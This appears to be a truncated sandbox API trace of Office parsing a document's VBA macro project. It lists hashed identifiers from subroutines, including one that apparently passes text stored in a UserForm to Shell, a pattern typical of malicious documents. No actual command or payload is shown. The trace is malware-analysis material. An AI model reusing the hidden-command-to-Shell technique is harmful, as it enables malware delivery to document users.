LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="If") returned 0x105da8 [0041.177] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="ext1") returned 0x107b93 [0041.177] strcpy_s (in: _Dst=0x7fee460ea60, _DstSize=0x100, _Src="ext1" | out: _Dst="ext1") returned 0x0 [0041.177] atoi (_Str="1") returned 1 [0041.177] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Then") returned 0x10b933 [0041.177] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="doc_print_header") returned 0x10ccd4 [0041.177] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="UserForm1") returned 0x10d629 [0041.177] strcpy_s (in: _Dst=0x7fee460ea60, _DstSize=0x100, _Src="UserForm1" | out: _Dst="UserForm1") returned 0x0 [0041.177] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Text1") returned 0x107eb3 [0041.177] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Len") returned 0x10adf9 [0041.177] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="UserForm1") returned 0x10d629 [0041.177] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Text1") returned 0x107eb3 [0041.177] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="ext1") returned 0x107b93 [0041.177] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="date_max") returned 0x10d882 [0041.178] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Else") returned 0x103b56 [0041.178] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="doc_print_header") returned 0x10ccd4 [0041.178] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="UserForm1") returned 0x10d629 [0041.178] strcpy_s (in: _Dst=0x7fee460ea60, _DstSize=0x100, _Src="UserForm1" | out: _Dst="UserForm1") returned 0x0 [0041.178] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Text1") returned 0x107eb3 [0041.178] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="ext1") returned 0x107b93 [0041.178] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="date_max") returned 0x10d882 [0041.178] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="End") returned 0x1089cd [0041.178] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="If") returned 0x105da8 [0041.178] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="End") returned 0x1089cd [0041.178] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Sub") returned 0x10d5ac [0041.178] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Sub") returned 0x10d5ac [0041.178] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="files_replace") returned 0x101f49 [0041.178] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x505011e, cbMultiByte=13, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 13 [0041.178] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x505011e, cbMultiByte=13, lpWideCharStr=0x6b84ff8, cchWideChar=13 | out: lpWideCharStr="files_replace") returned 13 [0041.179] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="C1") returned 0x105cb5 [0041.179] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="ByRef") returned 0x1074ef [0041.179] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="op") returned 0x105e90 [0041.179] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="op") returned 0x105e90 [0041.179] strcpy_s (in: _Dst=0x7fee460efc0, _DstSize=0x100, _Src="op" | out: _Dst="op") returned 0x0 [0041.179] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="st1") returned 0x10d576 [0041.179] atoi (_Str="1") returned 1 [0041.179] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="replacefiles") returned 0x107a9a [0041.179] strcpy_s (in: _Dst=0x7fee460efc0, _DstSize=0x100, _Src="replacefiles" | out: _Dst="replacefiles") returned 0x0 [0041.179] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="st1") returned 0x10d576 [0041.179] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="op") returned 0x105e90 [0041.179] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="C1") returned 0x105cb5 [0041.179] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="End") returned 0x1089cd [0041.179] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Sub") returned 0x10d5ac [0041.179] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Sub") returned 0x10d5ac [0041.179] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="doc_print_header") returned 0x10ccd4 [0041.179] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x38a2fb6, cbMultiByte=16, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 16 [0041.179] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x38a2fb6, cbMultiByte=16, lpWideCharStr=0x6b84ff8, cchWideChar=16 | out: lpWideCharStr="doc_print_header") returned 16 [0041.180] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="str1") returned 0x103546 [0041.180] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="pty") returned 0x10c58f [0041.180] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="ByRef") returned 0x1074ef [0041.180] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="rmin") returned 0x104909 [0041.180] IMalloc:Realloc (This=0x7feffc15380, pv=0x6ad64e0, cb=0x400) returned 0x3e42690 [0041.180] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="s11") returned 0x10d067 [0041.180] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Left") returned 0x107be5 [0041.180] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="str1") returned 0x103546 [0041.180] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="pty") returned 0x10c58f [0041.180] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="s11") returned 0x10d067 [0041.180] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="s11") returned 0x10d067 [0041.180] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="rmin") returned 0x104909 [0041.180] strcpy_s (in: _Dst=0x7fee460efc0, _DstSize=0x100, _Src="rmin" | out: _Dst="rmin") returned 0x0 [0041.180] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Right") returned 0x10150d [0041.180] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="s11") returned 0x10d067 [0041.180] atoi (_Str="2") returned 2 [0041.180] atoi (_Str="1") returned 1 [0041.180] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="End") returned 0x1089cd [0041.180] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Sub") returned 0x10d5ac [0041.180] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Sub") returned 0x10d5ac [0041.180] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="doveryboll") returned 0x1034da [0041.180] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x38a2d56, cbMultiByte=10, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 10 [0041.180] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x38a2d56, cbMultiByte=10, lpWideCharStr=0x68f0a58, cchWideChar=10 | out: lpWideCharStr="doveryboll") returned 10 [0041.181] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="m") returned 0x101064 [0041.181] IMalloc:Realloc (This=0x7feffc15380, pv=0x6ad7980, cb=0x400) returned 0x3e42aa0 [0041.181] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Dim") returned 0x1083c4 [0041.181] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="n") returned 0x101065 [0041.181] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="As") returned 0x105c8d [0041.181] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Integer") returned 0x10b48a [0041.181] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Dim") returned 0x1083c4 [0041.181] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="sadd") returned 0x10cdf7 [0041.181] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="As") returned 0x105c8d [0041.181] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="String") returned 0x10102a [0041.181] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="With") returned 0x104bed [0041.181] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="UserForm1") returned 0x10d629 [0041.181] strcpy_s (in: _Dst=0x7fee460ea60, _DstSize=0x100, _Src="UserForm1" | out: _Dst="UserForm1") returned 0x0 [0041.181] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="sadd") returned 0x10cdf7 [0041.181] strcpy_s (in: _Dst=0x7fee460efc0, _DstSize=0x100, _Src="sadd" | out: _Dst="sadd") returned 0x0 [0041.181] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="ValidText") returned 0x10229c [0041.181] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="n") returned 0x101065 [0041.181] strcpy_s (in: _Dst=0x7fee460efc0, _DstSize=0x100, _Src="n" | out: _Dst="n") returned 0x0 [0041.181] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="m") returned 0x101064 [0041.181] atoi (_Str="502") returned 502 [0041.181] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="End") returned 0x1089cd [0041.182] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="With") returned 0x104bed [0041.182] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="If") returned 0x105da8 [0041.182] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="m") returned 0x101064 [0041.182] strcpy_s (in: _Dst=0x7fee460ea60, _DstSize=0x100, _Src="m" | out: _Dst="m") returned 0x0 [0041.182] atoi (_Str="502") returned 502 [0041.182] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Then") returned 0x10b933 [0041.182] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Shell") returned 0x10d756 [0041.182] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="sadd") returned 0x10cdf7 [0041.182] strcpy_s (in: _Dst=0x7fee460ea60, _DstSize=0x100, _Src="sadd" | out: _Dst="sadd") returned 0x0 [0041.182] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="n") returned 0x101065 [0041.182] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="End") returned 0x1089cd [0041.182] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Sub") returned 0x10d5ac [0041.182] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Sub") returned 0x10d5ac [0041.182] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="ValidateOptionsForm") returned 0x10cbbe [0041.182] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x38a2b8e, cbMultiByte=19, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 19 [0041.182] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x38a2b8e, cbMultiByte=19, lpWideCharStr=0x6b84ff8, cchWideChar=19 | out: lpWideCharStr="ValidateOptionsForm") returned 19 [0041.182] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="wstr1") returned 0x105c41 [0041.182] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="wstr1") returned 0x105c41 [0041.182] strcpy_s (in: _Dst=0x7fee460efc0, _DstSize=0x100, _Src="wstr1" | out: _Dst="wstr1") returned 0x0 [0041.182] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="wstr1") returned 0x105c41 [0041.182] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="UserForm1") returned 0x10d629 [0041.182] strcpy_s (in: _Dst=0x7fee460efc0, _DstSize=0x100, _Src="UserForm1" | out: _Dst="UserForm1") returned 0x0 [0041.183] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="TextBox1") returned 0x1053a6 [0041.183] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="wstr1") returned 0x105c41 [0041.183] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="End") returned 0x1089cd [0041.183] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Sub") returned 0x10d5ac [0041.183] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Sub") returned 0x10d5ac [0041.183] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="CloseDateForm") returned 0x1089d5 [0041.183] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x38a2e36, cbMultiByte=13, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 13 [0041.183] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x38a2e36, cbMultiByte=13, lpWideCharStr=0x6b84ff8, cchWideChar=13 | out: lpWideCharStr="CloseDateForm") returned 13 [0041.183] IMalloc:Realloc (This=0x7feffc15380, pv=0x3e42690, cb=0x800) returned 0x66e9c80 [0041.183] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Dim") returned 0x1083c4 [0041.183] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="str2") returned 0x103547 [0041.183] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="As") returned 0x105c8d [0041.183] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="String") returned 0x10102a [0041.183] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="files_replace") returned 0x101f49 [0041.183] strcpy_s (in: _Dst=0x7fee460efc0, _DstSize=0x100, _Src="files_replace" | out: _Dst="files_replace") returned 0x0 [0041.183] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="UserForm1") returned 0x10d629 [0041.183] strcpy_s (in: _Dst=0x7fee460ea60, _DstSize=0x100, _Src="UserForm1" | out: _Dst="UserForm1") returned 0x0 [0041.183] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="date1") returned 0x1031d4 [0041.184] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="str2") returned 0x103547 [0041.184] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="UserForm1") returned 0x10d629 [0041.184] strcpy_s (in: _Dst=0x7fee460efc0, _DstSize=0x100, _Src="UserForm1" | out: _Dst="UserForm1") returned 0x0 [0041.184] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="EditText1") returned 0x1097ee [0041.184] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="str2") returned 0x103547 [0041.184] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="str2") returned 0x103547 [0041.184] strcpy_s (in: _Dst=0x7fee460efc0, _DstSize=0x100, _Src="str2" | out: _Dst="str2") returned 0x0 [0041.184] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="str2") returned 0x103547 [0041.184] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="UserForm1") returned 0x10d629 [0041.184] strcpy_s (in: _Dst=0x7fee460efc0, _DstSize=0x100, _Src="UserForm1" | out: _Dst="UserForm1") returned 0x0 [0041.184] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="ValidText") returned 0x10229c [0041.184] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="str2") returned 0x103547 [0041.184] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="End") returned 0x1089cd [0041.184] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Sub") returned 0x10d5ac [0041.184] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Sub") returned 0x10d5ac [0041.184] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="date_now") returned 0x10dfdf [0041.184] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x50503e2, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0041.184] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x50503e2, cbMultiByte=8, lpWideCharStr=0x68f0a58, cchWideChar=8 | out: lpWideCharStr="date_now") returned 8 [0041.185] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="ByRef") returned 0x1074ef [0041.185] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="b1") returned 0x105c90 [0041.185] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="ByRef") returned 0x1074ef [0041.185] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="control") returned 0x10b288 [0041.185] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Cell1") returned 0x108cf8 [0041.185] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="log2") returned 0x10b162 [0041.185] atoi (_Str="1") returned 1 [0041.185] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="With") returned 0x104bed [0041.185] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="UserForm1") returned 0x10d629 [0041.185] strcpy_s (in: _Dst=0x7fee460ea60, _DstSize=0x100, _Src="UserForm1" | out: _Dst="UserForm1") returned 0x0 [0041.185] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="log2") returned 0x10b162 [0041.185] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Len") returned 0x10adf9 [0041.185] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Text1") returned 0x107eb3 [0041.185] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="If") returned 0x105da8 [0041.185] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="b1") returned 0x105c90 [0041.185] strcpy_s (in: _Dst=0x7fee460ea60, _DstSize=0x100, _Src="b1" | out: _Dst="b1") returned 0x0 [0041.185] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="log2") returned 0x10b162 [0041.185] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Then") returned 0x10b933 [0041.185] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="b") returned 0x101059 [0041.186] strcpy_s (in: _Dst=0x7fee460efc0, _DstSize=0x100, _Src="b" | out: _Dst="b") returned 0x0 [0041.186] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="doc_print_header") returned 0x10ccd4 [0041.186] strcpy_s (in: _Dst=0x7fee460efc0, _DstSize=0x100, _Src="doc_print_header" | out: _Dst="doc_print_header") returned 0x0 [0041.186] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Text1") returned 0x107eb3 [0041.186] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="b1") returned 0x105c90 [0041.186] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="b") returned 0x101059 [0041.186] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="If") returned 0x105da8 [0041.186] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Cell1") returned 0x108cf8 [0041.186] strcpy_s (in: _Dst=0x7fee460ea60, _DstSize=0x100, _Src="Cell1" | out: _Dst="Cell1") returned 0x0 [0041.186] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="b") returned 0x101059 [0041.186] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Then") returned 0x10b933 [0041.186] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="b1") returned 0x105c90 [0041.186] strcpy_s (in: _Dst=0x7fee460efc0, _DstSize=0x100, _Src="b1" | out: _Dst="b1") returned 0x0 [0041.186] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="b1") returned 0x105c90 [0041.186] atoi (_Str="1") returned 1 [0041.186] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="date_now") returned 0x10dfdf [0041.186] strcpy_s (in: _Dst=0x7fee460efc0, _DstSize=0x100, _Src="date_now" | out: _Dst="date_now") returned 0x0 [0041.186] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="b1") returned 0x105c90 [0041.186] strcpy_s (in: _Dst=0x7fee460ea60, _DstSize=0x100, _Src="b1" | out: _Dst="b1") returned 0x0 [0041.186] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="control") returned 0x10b288 [0041.186] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Cell1") returned 0x108cf8 [0041.186] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Else") returned 0x103b56 [0041.186] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="control") returned 0x10b288 [0041.186] strcpy_s (in: _Dst=0x7fee460efc0, _DstSize=0x100, _Src="control" | out: _Dst="control") returned 0x0 [0041.187] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="b1") returned 0x105c90 [0041.187] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="End") returned 0x1089cd [0041.187] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="If") returned 0x105da8 [0041.187] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="End") returned 0x1089cd [0041.187] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="If") returned 0x105da8 [0041.187] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="End") returned 0x1089cd [0041.187] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="With") returned 0x104bed [0041.187] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="End") returned 0x1089cd [0041.187] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Sub") returned 0x10d5ac [0041.187] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Sub") returned 0x10d5ac [0041.187] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="strings_attached") returned 0x10a13e [0041.187] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x505001e, cbMultiByte=16, lpWideCharStr=0x6b84ff8, cchWideChar=16 | out: lpWideCharStr="strings_attached") returned 16 [0041.187] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="per2") returned 0x109436 [0041.187] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="ByRef") returned 0x1074ef [0041.187] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="arg1") returned 0x1042e5 [0041.187] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="arg1") returned 0x1042e5 [0041.187] strcpy_s (in: _Dst=0x7fee460efc0, _DstSize=0x100, _Src="arg1" | out: _Dst="arg1") returned 0x0 [0041.187] atoi (_Str="0") returned 0 [0041.187] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="sb1") returned 0x10d2dc [0041.187] atoi (_Str="1") returned 1 [0041.187] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="date_now") returned 0x10dfdf [0041.187] strcpy_s (in: _Dst=0x7fee460efc0, _DstSize=0x100, _Src="date_now" | out: _Dst="date_now") returned 0x0 [0041.187] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="sb1") returned 0x10d2dc [0041.187] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="arg1") returned 0x1042e5 [0041.188] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="per2") returned 0x109436 [0041.188] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="End") returned 0x1089cd [0041.188] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Sub") returned 0x10d5ac [0041.188] IMalloc:Realloc (This=0x7feffc15380, pv=0x3e42aa0, cb=0x800) returned 0x66ea490 [0041.188] CExposedStream::Read () returned 0x0 [0041.188] IMalloc:Realloc (This=0x7feffc15380, pv=0x6ca4d00, cb=0x6b4) returned 0x6ca4d00 [0041.188] CExposedStream::Release () returned 0x1 [0041.188] CExposedStream::Release () returned 0x0 [0041.188] CExposedStream::Release () returned 0x0 [0041.188] IMalloc:Free (This=0x7feffc15380, pv=0x6bc2cf0) [0041.188] IMalloc:Free (This=0x7feffc15380, pv=0x6bc0cc0) [0041.188] IMalloc:Free (This=0x7feffc15380, pv=0x6c94230) [0041.188] IMalloc:Free (This=0x7feffc15380, pv=0x6c92200) [0041.188] CExposedStream::Seek () returned 0x80030102 [0041.188] CExposedStream::Release () returned 0x0 [0041.188] IMalloc:Free (This=0x7feffc15380, pv=0x26087f0) [0041.188] lstrcpyA (in: lpString1=0x2747a7c, lpString2="PROJECT" | out: lpString1="PROJECT") returned="PROJECT" [0041.188] CExposedDocFile::Stat () returned 0x0 [0041.188] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2747a7c, cbMultiByte=-1, lpWideCharStr=0x187960, cchWideChar=8 | out: lpWideCharStr="PROJECT") returned 8 [0041.189] CExposedDocFile::OpenStream () returned 0x0 [0041.189] CExposedDocFile::AddRef () returned 0x3 [0041.189] CExposedStream::Stat () returned 0x0 [0041.189] CExposedStream::Read () returned 0x0 [0041.189] lstrlenA (lpString="") returned 0 [0041.189] lstrcpyA (in: lpString1=0x4dddf50, lpString2="" | out: lpString1="") returned="" [0041.189] lstrlenA (lpString="") returned 0 [0041.189] lstrcpyA (in: lpString1=0x4dddf90, lpString2="" | out: lpString1="") returned="" [0041.189] lstrlenA (lpString="") returned 0 [0041.189] lstrcpyA (in: lpString1=0x2748ae0, lpString2="" | out: lpString1="") returned="" [0041.189] lstrcpynA (in: lpString1=0x2748b40, lpString2="Host Extender Info", iMaxLength=256 | out: lpString1="Host Extender Info") returned="Host Extender Info" [0041.190] lstrcpyA (in: lpString1=0x2748d80, lpString2="{3832D640-CF90-11CF-8E43-90B92BEC6268};VBE;&H00000000" | out: lpString1="{3832D640-CF90-11CF-8E43-90B92BEC6268};VBE;&H00000000") returned="{3832D640-CF90-11CF-8E43-90B92BEC6268};VBE;&H00000000" [0041.190] lstrcpynA (in: lpString1=0x2748de0, lpString2="Workspace", iMaxLength=256 | out: lpString1="Workspace") returned="Workspace" [0041.190] lstrcpyA (in: lpString1=0x2749020, lpString2="22, 29, 2109, 555, C" | out: lpString1="22, 29, 2109, 555, C") returned="22, 29, 2109, 555, C" [0041.190] lstrcpyA (in: lpString1=0x2749170, lpString2="110, 145, 2197, 671, C, 44, 58, 2131, 584, C" | out: lpString1="110, 145, 2197, 671, C, 44, 58, 2131, 584, C") returned="110, 145, 2197, 671, C, 44, 58, 2131, 584, C" [0041.191] lstrcpyA (in: lpString1=0x2749310, lpString2="66, 87, 2153, 613, C" | out: lpString1="66, 87, 2153, 613, C") returned="66, 87, 2153, 613, C" [0041.191] CExposedDocFile::OpenStream () returned 0x0 [0041.191] CExposedStream::Stat () returned 0x0 [0041.191] CExposedStream::Read () returned 0x0 [0041.191] CExposedStream::Release () returned 0x0 [0041.191] lstrcpyA (in: lpString1=0x4dddf70, lpString2="" | out: lpString1="") returned="" [0041.191] lstrcmpiA (lpString1="ThisDocument", lpString2="ThisDocument") returned 0 [0041.191] lstrlenA (lpString="ThisDocument") returned 12 [0041.191] lstrcpyA (in: lpString1=0x4dddfb0, lpString2="" | out: lpString1="") returned="" [0041.191] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2747d39, cbMultiByte=-1, lpWideCharStr=0x1878a0, cchWideChar=10 | out: lpWideCharStr="UserForm1") returned 10 [0041.191] CExposedDocFile::OpenStorage () returned 0x0 [0041.194] lstrcpyA (in: lpString1=0x2749fbc, lpString2="\x03VBFrame" | out: lpString1="\x03VBFrame") returned="\x03VBFrame" [0041.194] CExposedDocFile::Stat () returned 0x0 [0041.194] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2749fbc, cbMultiByte=-1, lpWideCharStr=0x187770, cchWideChar=9 | out: lpWideCharStr="\x03VBFrame") returned 9 [0041.194] CExposedDocFile::OpenStream () returned 0x0 [0041.194] CExposedDocFile::AddRef () returned 0x2 [0041.194] CoCreateGuid (in: pguid=0x274a130 | out: pguid=0x274a130*(Data1=0x85916731, Data2=0xc21f, Data3=0x41b4, Data4=([0]=0xac, [1]=0x4a, [2]=0x71, [3]=0xf2, [4]=0xe2, [5]=0xec, [6]=0x82, [7]=0x94))) returned 0x0 [0041.194] CoCreateGuid (in: pguid=0x274a140 | out: pguid=0x274a140*(Data1=0xd9a9c128, Data2=0xbc74, Data3=0x4aed, Data4=([0]=0xa3, [1]=0x2c, [2]=0xee, [3]=0xe2, [4]=0x4, [5]=0x34, [6]=0xcf, [7]=0xf2))) returned 0x0 [0041.194] GetCurrentThreadId () returned 0x8c0 [0041.194] GetCurrentThreadId () returned 0x8c0 [0041.195] GetCurrentThreadId () returned 0x8c0 [0041.195] CExposedStream::Stat () returned 0x0 [0041.195] GlobalLock (hMem=0x6e50078) returned 0x3c28ae0 [0041.195] GlobalSize (hMem=0x6e50078) returned 0x200 [0041.195] CExposedStream::Read () returned 0x0 [0041.195] GetCurrentThreadId () returned 0x8c0 [0041.195] GetCurrentThreadId () returned 0x8c0 [0041.195] lstrcmpiA (lpString1="VERSION", lpString2="VERSION") returned 0 [0041.195] lstrcmpiA (lpString1="Begin", lpString2="Begin") returned 0 [0041.195] CLSIDFromString (in: lpsz="{C62A69F0-16DC-11CE-9E98-00AA00574A4F}", pclsid=0x187368 | out: pclsid=0x187368*(Data1=0xc62a69f0, Data2=0x16dc, Data3=0x11ce, Data4=([0]=0x9e, [1]=0x98, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x57, 